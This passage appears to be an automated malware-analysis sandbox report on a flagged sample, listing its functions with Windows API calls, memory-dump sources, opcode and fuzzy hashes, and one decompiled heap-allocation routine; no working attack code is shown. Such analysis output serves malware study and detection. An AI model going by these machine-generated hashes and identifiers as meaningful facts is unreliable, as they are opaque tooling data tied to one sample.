                                                                                              • SetConsoleCtrlHandler.KERNELBASE(?,00000E80,?,?), ref: 024E02F1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291106224.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: ConsoleCtrlHandler
                                                                                              • String ID:
                                                                                              • API String ID: 1513847179-0
                                                                                              • Opcode ID: c7f36920b795b4ce93e099618bc9e611a9947128a3255cba121128b224823037
                                                                                              • Instruction ID: fbc757c3f4704834fb4da45ea5d8018e1e40ba70e607b6e6e6b2baa700b0bc58
                                                                                              • Opcode Fuzzy Hash: c7f36920b795b4ce93e099618bc9e611a9947128a3255cba121128b224823037
                                                                                              • Instruction Fuzzy Hash: 7311E6715083806FD3118B16CC45F26FFB4EF86720F09818FE8489B282D625B818C7A2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 024E1136, Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ioctlsocket.WS2_32(?,00000E80,1055896A,00000000,00000000,00000000,00000000), ref: 024E118F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291106224.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: ioctlsocket
                                                                                              • String ID:
                                                                                              • API String ID: 3577187118-0
                                                                                              • Opcode ID: ba0534e3ef1e1c93575fffd79922abb9eab4c3c372d6cba65fed9d4fffab97b6
                                                                                              • Instruction ID: a39f8b1a2f7fb6874c6348368d101fedfa180650c16ddfe73fe2f658ea283d97
                                                                                              • Opcode Fuzzy Hash: ba0534e3ef1e1c93575fffd79922abb9eab4c3c372d6cba65fed9d4fffab97b6
                                                                                              • Instruction Fuzzy Hash: B911A3B1900204AFEB11CF55DC84BA6FBA8EF44321F14C46BEE4D9B241D774A804CB76
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00C5A330, Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FindCloseChangeNotification.KERNELBASE(?), ref: 00C5A384
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.290770281.0000000000C5A000.00000040.00000001.sdmp, Offset: 00C5A000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: ChangeCloseFindNotification
                                                                                              • String ID:
                                                                                              • API String ID: 2591292051-0
                                                                                              • Opcode ID: 4d8c61ed31cf57d5af8fc4391877e12cadc8f64aa28b48ae993f1892b9d9ce26
                                                                                              • Instruction ID: 743f82f342e73ff507419375113867905f428cfb0b13a4ee308124ed6122a8ed
                                                                                              • Opcode Fuzzy Hash: 4d8c61ed31cf57d5af8fc4391877e12cadc8f64aa28b48ae993f1892b9d9ce26
                                                                                              • Instruction Fuzzy Hash: D411C6755093849FD711CF15DC84B52BFA8EF01221F08C0AAED899B252D375A948CB62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 024E1574, Relevance: 1.6, APIs: 1, Instructions: 54fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • MapViewOfFile.KERNELBASE(?,?,?,?,?), ref: 024E15D4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291106224.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: FileView
                                                                                              • String ID:
                                                                                              • API String ID: 3314676101-0
                                                                                              • Opcode ID: 58e49c03b38580b4a34ca76b14556225ca1428b01fcdecceb72cc7079711499c
                                                                                              • Instruction ID: 1664c06dbbbba6650dc52468eaccf9fc1a2dc74c390063ab4eae2dfc70578fa0
                                                                                              • Opcode Fuzzy Hash: 58e49c03b38580b4a34ca76b14556225ca1428b01fcdecceb72cc7079711499c
                                                                                              • Instruction Fuzzy Hash: DB11B271409380AFDB22CF65DC44B52FFB4EF05221F0884AAED898B262D375A418CB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 024E2EB6, Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CopyFileW.KERNELBASE(?,?,?), ref: 024E2EFE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291106224.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: CopyFile
                                                                                              • String ID:
                                                                                              • API String ID: 1304948518-0
                                                                                              • Opcode ID: 61a2a1e9964496df4cb2baf2d79347783911b4f23b084980af8b5e5492886eb5
                                                                                              • Instruction ID: db8a78081af2f6c7e476cd6b8caf0a3b34102b166892c3307802cb1269476978
                                                                                              • Opcode Fuzzy Hash: 61a2a1e9964496df4cb2baf2d79347783911b4f23b084980af8b5e5492886eb5
                                                                                              • Instruction Fuzzy Hash: 051152716002018FEB50DF29DC45766FBE8EF54211F0884ABDD4ADB742D7B4D448CA62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00C5BE96, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetFileType.KERNELBASE(?,00000E80,1055896A,00000000,00000000,00000000,00000000), ref: 00C5BEE9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.290770281.0000000000C5A000.00000040.00000001.sdmp, Offset: 00C5A000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: FileType
                                                                                              • String ID:
                                                                                              • API String ID: 3081899298-0
                                                                                              • Opcode ID: d65c562f68ea6f8c7f86c8824a8eaa910e9838a3cedbedbcc5d02a14530f1aaf
                                                                                              • Instruction ID: 7e52334e2f158d1ff16d2ec1b1242b3dce3892eaee1aab20df35ec1847cef47e
                                                                                              • Opcode Fuzzy Hash: d65c562f68ea6f8c7f86c8824a8eaa910e9838a3cedbedbcc5d02a14530f1aaf
                                                                                              • Instruction Fuzzy Hash: A9014975500200AFE710CB56DC81FA6FFA8DF44321F18C456EE089B241D774A948CA76
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 024E28F3, Relevance: 1.6, APIs: 1, Instructions: 51windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • PostMessageW.USER32(?,?,?,?), ref: 024E2955
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291106224.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: MessagePost
                                                                                              • String ID:
                                                                                              • API String ID: 410705778-0
                                                                                              • Opcode ID: 64453510cf4c0666c4c46d576a2cfda8ddda98c294cc564e03193f6874bb7c7a
                                                                                              • Instruction ID: 7e0165fddaeade1e65a2fb1e39192821c52a26d49a964930cafd235be5856b57
                                                                                              • Opcode Fuzzy Hash: 64453510cf4c0666c4c46d576a2cfda8ddda98c294cc564e03193f6874bb7c7a
                                                                                              • Instruction Fuzzy Hash: 0B1151315097849FDB228F15DC44B52FFB4EF16220F0985DEED894B263D365A858CB62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 024E2596, Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291106224.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: ClassInfo
                                                                                              • String ID:
                                                                                              • API String ID: 3534257612-0
                                                                                              • Opcode ID: 22d7b0588262a363b4748860660bb65648fbc397f778def4a583b2f255935789
                                                                                              • Instruction ID: 8f004ecdf602e9979e1abf5c86793c1bb155c666478053bbe891bbb36c8ba6d9
                                                                                              • Opcode Fuzzy Hash: 22d7b0588262a363b4748860660bb65648fbc397f778def4a583b2f255935789
                                                                                              • Instruction Fuzzy Hash: DF0188756002048FEB20CF19DD55B66FBE8EF44711F08C09AED4A8B351D760E848CB71
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00C5AA6C, Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.290770281.0000000000C5A000.00000040.00000001.sdmp, Offset: 00C5A000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: LongWindow
                                                                                              • String ID:
                                                                                              • API String ID: 1378638983-0
                                                                                              • Opcode ID: c9ee1c56874a78197e9a57471038760c5cd5fb7af07850b1bb899c37963fd814
                                                                                              • Instruction ID: a4ed2dcac66929a5a5a79d18241dc4b9cc47e64d61bdf2ed19c7a5fe82551e16
                                                                                              • Opcode Fuzzy Hash: c9ee1c56874a78197e9a57471038760c5cd5fb7af07850b1bb899c37963fd814
                                                                                              • Instruction Fuzzy Hash: AF11AC354097849FD7218F15DC84B52FFB4EF06320F08C49AED894B262D375A94CCB62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00C5B6E2, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LsaLookupNames2.ADVAPI32(?,00000E80,?,?), ref: 00C5B732
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.290770281.0000000000C5A000.00000040.00000001.sdmp, Offset: 00C5A000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: LookupNames2
                                                                                              • String ID:
                                                                                              • API String ID: 2701605370-0
                                                                                              • Opcode ID: 318ad564c0d5cd16dabce0bca07b900ae56441b4b0c9f0added8b00afc041831
                                                                                              • Instruction ID: 1e7e8e2ddb899f4739bc67821d65c5be7845f650be5e989f41045a455c18ab02
                                                                                              • Opcode Fuzzy Hash: 318ad564c0d5cd16dabce0bca07b900ae56441b4b0c9f0added8b00afc041831
                                                                                              • Instruction Fuzzy Hash: 5401B172900200ABD310DF1ADC85B76FBE8FB84B20F14812AED089B645E771F915CBE2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00C5A2AE, Relevance: 1.5, APIs: 1, Instructions: 47networkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • WSAStartup.WS2_32(?,00000E80,?,?), ref: 00C5A2FE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.290770281.0000000000C5A000.00000040.00000001.sdmp, Offset: 00C5A000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: Startup
                                                                                              • String ID:
                                                                                              • API String ID: 724789610-0
                                                                                              • Opcode ID: d837a84a75b0c26d5d824a5f52f0d13bcabe89386b435aa7ca4f96a7dbedbc3c
                                                                                              • Instruction ID: be48b5c457fa1d181a7c26c55086e100e0adaadffe5e09e6062d0eb148308645
                                                                                              • Opcode Fuzzy Hash: d837a84a75b0c26d5d824a5f52f0d13bcabe89386b435aa7ca4f96a7dbedbc3c
                                                                                              • Instruction Fuzzy Hash: 95017171900200ABD710DF1ADC85B76FBE8FB84A20F14816AED089B645E675F915CBE6
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 024E14EE, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateFileMappingW.KERNELBASE(?,00000E80,?,?), ref: 024E153E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291106224.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: CreateFileMapping
                                                                                              • String ID:
                                                                                              • API String ID: 524692379-0
                                                                                              • Opcode ID: 6fad28a7d35be080b4e54ab3b6f009bbb065b28ac009013e51024495fb03712c
                                                                                              • Instruction ID: d83172367b9a7fc5ba678c1e4d52f9d4d19af488f54f2c591c8ec93e9db6a1f6
                                                                                              • Opcode Fuzzy Hash: 6fad28a7d35be080b4e54ab3b6f009bbb065b28ac009013e51024495fb03712c
                                                                                              • Instruction Fuzzy Hash: 8601B172900200ABD310DF1ADC85B76FBE8FB84B20F14812AED089B645E731F915CBE2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 024E1B6E, Relevance: 1.5, APIs: 1, Instructions: 46libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadLibraryShim.MSCOREE(?,?,?,?), ref: 024E1BB9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291106224.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: LibraryLoadShim
                                                                                              • String ID:
                                                                                              • API String ID: 1475914169-0
                                                                                              • Opcode ID: eaa11531c6bbf7a475337253e0c07b92942db6041bd6284134f7b56dc3d56775
                                                                                              • Instruction ID: a6f98c4f09d29de2e082435e486a888cdc001147fa100d7fc172033b94032be7
                                                                                              • Opcode Fuzzy Hash: eaa11531c6bbf7a475337253e0c07b92942db6041bd6284134f7b56dc3d56775
                                                                                              • Instruction Fuzzy Hash: 100180755002048FEB20CE1AD884B22FBE4EF14622F08809ADD4E8B752E375E848CA72
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00C5A62E, Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00C5A672
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.290770281.0000000000C5A000.00000040.00000001.sdmp, Offset: 00C5A000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: DuplicateHandle
                                                                                              • String ID:
                                                                                              • API String ID: 3793708945-0
                                                                                              • Opcode ID: 96c977cda919f95e9763caa7ae564e1670352df751cddec2f0f302be0eb54d30
                                                                                              • Instruction ID: 10a514feb4f46b35808789a54be81d1a44f7b91c410483974cb526b46862cfad
                                                                                              • Opcode Fuzzy Hash: 96c977cda919f95e9763caa7ae564e1670352df751cddec2f0f302be0eb54d30
                                                                                              • Instruction Fuzzy Hash: E501A976800600DFDB218F56D844B62FFE0EF48321F08C5AAEE894B652C776E458DF62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00C5A352, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FindCloseChangeNotification.KERNELBASE(?), ref: 00C5A384
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.290770281.0000000000C5A000.00000040.00000001.sdmp, Offset: 00C5A000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: ChangeCloseFindNotification
                                                                                              • String ID:
                                                                                              • API String ID: 2591292051-0
                                                                                              • Opcode ID: 9152e70abde67275d12f4bbfe0ceabbedb034265f62eff12e322146c7c72618c
                                                                                              • Instruction ID: 0b93ddc2931f1f6782e00e3365883fe965510f866549ebfb80eaa5b56e4ad7dc
                                                                                              • Opcode Fuzzy Hash: 9152e70abde67275d12f4bbfe0ceabbedb034265f62eff12e322146c7c72618c
                                                                                              • Instruction Fuzzy Hash: F601A2759002449FDB10CF2AD8847A6FFA4EF40325F18C0AADD598F352D279E948CBA2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00C5B8E2, Relevance: 1.5, APIs: 1, Instructions: 43registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegQueryValueExW.KERNELBASE(?,00000E80,?,?), ref: 00C5B932
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.290770281.0000000000C5A000.00000040.00000001.sdmp, Offset: 00C5A000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: QueryValue
                                                                                              • String ID:
                                                                                              • API String ID: 3660427363-0
                                                                                              • Opcode ID: 8f7506e02281ed1485cbe7f8783f62c6d99255423354f6872701d226ee550141
                                                                                              • Instruction ID: 67b14d9832d6a56dbdbe0523cced5e6d200b73e94e99f3034fb423feb7234090
                                                                                              • Opcode Fuzzy Hash: 8f7506e02281ed1485cbe7f8783f62c6d99255423354f6872701d226ee550141
                                                                                              • Instruction Fuzzy Hash: 4601AD72600200ABD210DF1ADC86B32FBE8FB88B20F14811AED085B745E771F915CBE6
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00C5BA82, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • setsockopt.WS2_32(?,?,?,?,?), ref: 00C5BAC0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.290770281.0000000000C5A000.00000040.00000001.sdmp, Offset: 00C5A000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: setsockopt
                                                                                              • String ID:
                                                                                              • API String ID: 3981526788-0
                                                                                              • Opcode ID: efed3a4a4a5feaa88ab6682c2004b5e4ac13adc6533128cec3d74c3ee1de177b
                                                                                              • Instruction ID: 7c92d01fe08fe55f0f968286343cf708a7b300ba1f6794773ffa8e2c480a888a
                                                                                              • Opcode Fuzzy Hash: efed3a4a4a5feaa88ab6682c2004b5e4ac13adc6533128cec3d74c3ee1de177b
                                                                                              • Instruction Fuzzy Hash: 73019E75400240DFDB20CF56D884BA6FFA0FF14321F18C4AAED594B212D375A858DBB2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 024E1596, Relevance: 1.5, APIs: 1, Instructions: 43fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • MapViewOfFile.KERNELBASE(?,?,?,?,?), ref: 024E15D4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291106224.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: FileView
                                                                                              • String ID:
                                                                                              • API String ID: 3314676101-0
                                                                                              • Opcode ID: d47e09cb58a7a9a79875b06cdee09e3ab41ffa6d26a9ba0673faa26738014c7a
                                                                                              • Instruction ID: e64cd3639154c985dbff1d02c9de84eb700993c9004f7dba3ca46ec155698739
                                                                                              • Opcode Fuzzy Hash: d47e09cb58a7a9a79875b06cdee09e3ab41ffa6d26a9ba0673faa26738014c7a
                                                                                              • Instruction Fuzzy Hash: 8F018C715002409FEB208F55D844B66FFE0EF04722F08C4AAED4E8B252D375A418CB62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 024E02A6, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetConsoleCtrlHandler.KERNELBASE(?,00000E80,?,?), ref: 024E02F1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291106224.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: ConsoleCtrlHandler
                                                                                              • String ID:
                                                                                              • API String ID: 1513847179-0
                                                                                              • Opcode ID: a7ff9bf761997bacb0c739e5c4bcd75d5a61d5786ff5418b0363ba893e8588b5
                                                                                              • Instruction ID: fc37d3a69efe774b0887ca1aabbd023fb83ecdc51037cf4a76c1c992b68246c4
                                                                                              • Opcode Fuzzy Hash: a7ff9bf761997bacb0c739e5c4bcd75d5a61d5786ff5418b0363ba893e8588b5
                                                                                              • Instruction Fuzzy Hash: 9201AD72600200ABD210DF1ADC86B32FBE8FB88B20F14815AED085B745E635F915CBE6
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 024E32DE, Relevance: 1.5, APIs: 1, Instructions: 42windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • PostMessageW.USER32(?,?,?,?), ref: 024E3319
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291106224.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: MessagePost
                                                                                              • String ID:
                                                                                              • API String ID: 410705778-0
                                                                                              • Opcode ID: 83a166881ff6d6c463eaec3307351e4bb736377579d217e830b55d5e16a201d5
                                                                                              • Instruction ID: faeeaef5352efb73e5f512d288dbc5d990ecbba69f05d4117445a5d08ab63ead
                                                                                              • Opcode Fuzzy Hash: 83a166881ff6d6c463eaec3307351e4bb736377579d217e830b55d5e16a201d5
                                                                                              • Instruction Fuzzy Hash: C401BC31500300DFEB218F56D884B66FFA0EF44321F08C0AAED4A4B652D7B1E458CB62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00C5A92A, Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.290770281.0000000000C5A000.00000040.00000001.sdmp, Offset: 00C5A000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: closesocket
                                                                                              • String ID:
                                                                                              • API String ID: 2781271927-0
                                                                                              • Opcode ID: 79e279fb30eb5d65e948840b6f32b14955ff476dadc41ae8774703e546183242
                                                                                              • Instruction ID: d4d6d16d3dec213074402bb7d663468c377b8fbe189c4dae764f59b7aa870106
                                                                                              • Opcode Fuzzy Hash: 79e279fb30eb5d65e948840b6f32b14955ff476dadc41ae8774703e546183242
                                                                                              • Instruction Fuzzy Hash: B201D1749002409FDB10CF16E8847A6FFA4EF44322F18C0AADD498F246D279A848CBB6
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 024E291A, Relevance: 1.5, APIs: 1, Instructions: 38windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • PostMessageW.USER32(?,?,?,?), ref: 024E2955
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291106224.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: MessagePost
                                                                                              • String ID:
                                                                                              • API String ID: 410705778-0
                                                                                              • Opcode ID: d4a827a155645521af3362995a73fb2e02b72f3423c3963ffafbb20df2ece5a5
                                                                                              • Instruction ID: b95bf2baf9ce644a17ebe2669f8509f6976dedf982cb67905d69f2b6015fd487
                                                                                              • Opcode Fuzzy Hash: d4a827a155645521af3362995a73fb2e02b72f3423c3963ffafbb20df2ece5a5
                                                                                              • Instruction Fuzzy Hash: 5C01A231500740DFEB20CF45D884B66FFA4EF14321F08D49AED4A0B266D3B5A458CF62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00C5AA8E, Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.290770281.0000000000C5A000.00000040.00000001.sdmp, Offset: 00C5A000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: LongWindow
                                                                                              • String ID:
                                                                                              • API String ID: 1378638983-0
                                                                                              • Opcode ID: 731fa2ff5dd0d928dcbfcd080fc5fd9a61dcc619492c415e5fb4f29610b7590d
                                                                                              • Instruction ID: 20a1e21818a2c9d699c9d2013d5f8abc802a99c9a36731d5736530d64cc28938
                                                                                              • Opcode Fuzzy Hash: 731fa2ff5dd0d928dcbfcd080fc5fd9a61dcc619492c415e5fb4f29610b7590d
                                                                                              • Instruction Fuzzy Hash: 3A01AD394006049FDB208F06D984762FFA0EF04721F18C19ADD8A0B252D275A94CEFB3
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00C5A6F2, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetErrorMode.KERNELBASE(?), ref: 00C5A724
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.290770281.0000000000C5A000.00000040.00000001.sdmp, Offset: 00C5A000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: ErrorMode
                                                                                              • String ID:
                                                                                              • API String ID: 2340568224-0
                                                                                              • Opcode ID: e23a004ef54ab58cf9cb405d7a32c3fdc786e48743837b4c933dca2100fe4a58
                                                                                              • Instruction ID: f34adb44aaa24b2315aa3ed433b1fdbc5ec3fa315027e61331b3c1c108f7ff3d
                                                                                              • Opcode Fuzzy Hash: e23a004ef54ab58cf9cb405d7a32c3fdc786e48743837b4c933dca2100fe4a58
                                                                                              • Instruction Fuzzy Hash: 97F0AF785006449FDB208F1AD884761FFA4EF48322F18C1AADD594B252D275A988CBA7
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00403E3D, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 94%
                                                                                              			E00403E3D(void* __ecx, long _a4) {
				void* _t4;
				void* _t6;
				void* _t7;
				long _t8;

				_t7 = __ecx;
				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E00404831())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x4132b0, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E00403829();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E004068FD(_t7, __eflags, _t8);
					_pop(_t7);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}







                                                                                              0x00403e3d
                                                                                              0x00403e43
                                                                                              0x00403e49
                                                                                              0x00403e7b
                                                                                              0x00403e80
                                                                                              0x00403e86
                                                                                              0x00000000
                                                                                              0x00403e86
                                                                                              0x00403e4d
                                                                                              0x00403e4f
                                                                                              0x00403e4f
                                                                                              0x00403e66
                                                                                              0x00403e6f
                                                                                              0x00403e77
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403e57
                                                                                              0x00403e59
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403e5c
                                                                                              0x00403e61
                                                                                              0x00403e62
                                                                                              0x00403e64
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403e64
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000001.265732741.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000001.265812009.0000000000414000.00000040.00020000.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1279760036-0
                                                                                              • Opcode ID: a4c9c6b9c171d7e3068f9dcb93680387a8cae48819217d3cebbdef174e207782
                                                                                              • Instruction ID: 2c5ed35c3885d6f2518923907421e71a1374dda36297243b1d9f5d3b1e0eb56a
                                                                                              • Opcode Fuzzy Hash: a4c9c6b9c171d7e3068f9dcb93680387a8cae48819217d3cebbdef174e207782
                                                                                              • Instruction Fuzzy Hash: 54E03922505222A6D6213F6ADC04F5B7E4C9F817A2F158777AD15B62D0CB389F0181ED
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 023A0898, Relevance: 1.5, Strings: 1, Instructions: 204COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291055002.00000000023A0000.00000040.00000001.sdmp, Offset: 023A0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: `5(r
                                                                                              • API String ID: 0-3683955166
                                                                                              • Opcode ID: f8203d956222d7e233898b869d2d375c9f3417991a0a3d952ca3c81d5dd99204
                                                                                              • Instruction ID: 8498e8a4308b2b6f0e9f23e15c02414dbb45cd83c79dbeb7bfe8b45e9c7e9365
                                                                                              • Opcode Fuzzy Hash: f8203d956222d7e233898b869d2d375c9f3417991a0a3d952ca3c81d5dd99204
                                                                                              • Instruction Fuzzy Hash: BE91B374E01218CFDB18DFA9C8A4BADBBB2FF49310F108169D50AAB3A1DB715985CF50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 023A0D20, Relevance: .3, Instructions: 329COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291055002.00000000023A0000.00000040.00000001.sdmp, Offset: 023A0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 836b4cb73a7b3343933cf948933981f637e2fbec5890e36bae17d4c679c5359d
                                                                                              • Instruction ID: c8f7dcb62b1a6aca1ee50567da74e8555714dd9bf409ed955b88a57dcdbcf4e7
                                                                                              • Opcode Fuzzy Hash: 836b4cb73a7b3343933cf948933981f637e2fbec5890e36bae17d4c679c5359d
                                                                                              • Instruction Fuzzy Hash: 4FF1C874A0060ADFCB04DFA8D5949DDBBB2FF85308F2085E8E4056B369DB716A4ACF51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 023A0D30, Relevance: .3, Instructions: 298COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
